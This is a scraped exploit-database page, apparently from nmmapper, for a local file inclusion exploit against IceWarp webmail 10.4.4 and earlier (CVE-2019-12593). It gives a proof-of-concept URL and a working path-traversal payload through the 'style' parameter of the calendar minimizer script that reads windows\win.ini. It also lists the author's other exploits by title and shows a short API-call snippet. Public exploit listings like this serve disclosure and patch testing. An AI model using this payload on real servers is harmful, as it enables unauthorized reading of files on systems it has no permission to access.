Now you can request a feature, improvement or collaborate with us.
Author
JameelNabbo
Platform
php
Release date
2019-06-04
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | # Exploit Title: IceWarp <=10.4.4 local file include # Date: 02/06/2019 # Exploit Author: JameelNabbo # Website: uitsec.com # Vendor Homepage: http://www.icewarp.com # Software Link: https://www.icewarp.com/downloads/trial/ # Version: 10.4.4 # Tested on: Windows 10 # CVE: CVE-2019-12593 POC: http://example.com/webmail/calendar/minimizer/index.php?style=[LFI] Example: http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2019-06-04 | "IceWarp 10.4.4 - Local File Inclusion" | webapps | php | JameelNabbo |
2019-05-27 | "Deltek Maconomy 2.2.5 - Local File Inclusion" | webapps | multiple | JameelNabbo |
2019-05-23 | "Nagios XI 5.6.1 - SQL injection" | webapps | php | JameelNabbo |
2019-03-04 | "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" | webapps | hardware | JameelNabbo |
2019-02-15 | "Jinja2 2.10 - 'from_string' Server Side Template Injection" | webapps | python | JameelNabbo |
2018-02-16 | "Twig < 2.4.4 - Server Side Template Injection" | webapps | php | JameelNabbo |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46959/?format=json')
For full documentation follow the link above